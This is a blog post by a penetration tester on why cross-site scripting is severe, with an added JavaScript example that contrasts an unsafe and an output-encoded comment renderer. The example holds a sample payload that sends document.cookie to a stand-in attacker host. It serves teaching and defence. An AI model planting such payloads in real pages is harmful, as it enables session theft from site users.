Cross-site scripting, otherwise known as XSS, is one of the most common web application vulnerabilities on the internet. I have found this to be true through both data research and personal experience during penetration testing engagements. What is XSS? Simply put, XSS is a vulnerability where a malicious user can insert script code into an application so that another user's browser later executes it without that user's knowledge. All too often web application developers overlook encoding or sanitizing user input before it is written back into a page, whether throughout the entire application or in a single parameter. In my experience some common spots for XSS vulnerabilities are comments, account names, and titles for pages or posts: anywhere one user's input is stored and later shown to other users. Unfortunately, XSS is sometimes seen as a less-than-severe vulnerability. I'm writing this blog post to explain how and why XSS is one of the most severe vulnerabilities an application can have.
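To make the "comment that another user's browser executes" scenario concrete, here is an added example (my own illustration, not code from the original post or from any particular application). It assumes a hypothetical comment renderer in a Node.js application: `renderCommentUnsafe` concatenates the stored comment straight into HTML, which is the mistake described above, and `renderCommentSafe` HTML-encodes every untrusted value before it is written into the page. The helper names, the `containsActiveContent` check, and the sample comment from "mallory" are all constructed for this example.

```javascript
// Added example, not from the original post. A minimal stored-XSS comment
// renderer, vulnerable and hardened, with a crude check that tells them apart.
// Names and the sample comment below are assumptions made for illustration.

// Encode the five characters that let text break out of an HTML text node or
// quoted attribute value. Output encoding for the HTML context is what stops
// the browser from treating a user's comment as markup.
function escapeHtml(input) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
  };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: the stored comment is concatenated directly into the page, so a
// comment containing <script> or an inline event handler becomes executable
// markup for every user who views the thread. This is the 'before' case.
function renderCommentUnsafe(author, body) {
  return `<div class="comment"><b>${author}</b>: ${body}</div>`;
}

// Hardened: every untrusted value is HTML-encoded at the point it is written
// into an HTML text context, so the browser renders the payload as literal text.
function renderCommentSafe(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Does the rendered HTML contain a script tag or a tag carrying an inline
// event handler (on*=)? Good enough to show the difference between the two
// renderers; it is not a substitute for a real HTML parser or a CSP.
function containsActiveContent(html) {
  return /<script\b|<\w+[^>]*\son\w+\s*=/i.test(html);
}

// Constructed sample: a comment body a malicious user might submit to steal
// the session cookie of anyone who later views the page.
const maliciousComment = {
  author: 'mallory',
  body: 'nice post <script>location="https://attacker.example/?c="+document.cookie</script>',
};

// Run directly (node xss_comment.js) to see both renderings side by side.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe:', renderCommentUnsafe(maliciousComment.author, maliciousComment.body));
  console.log('safe:  ', renderCommentSafe(maliciousComment.author, maliciousComment.body));
}
```

One caveat worth stating here: `escapeHtml` is only correct for values placed in an HTML text node or a quoted attribute. Data written into a JavaScript string, a URL, or a CSS value needs encoding for that context instead, which is why "sanitizing input" on the way in is not a substitute for encoding on the way out.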
XSS is bad. Let's clear the air now. But why is XSS so bad? Is forcing annoying pop-up alerts on unsuspecting users truly that big of a deal? The simple answer is yes: any time one user can supply code that runs in another user's browser, alarms should be going off and administrators' jaws should be dropping. Let's go beyond alert('Pwn3d!'); and look at some of the severe consequences XSS can lead to...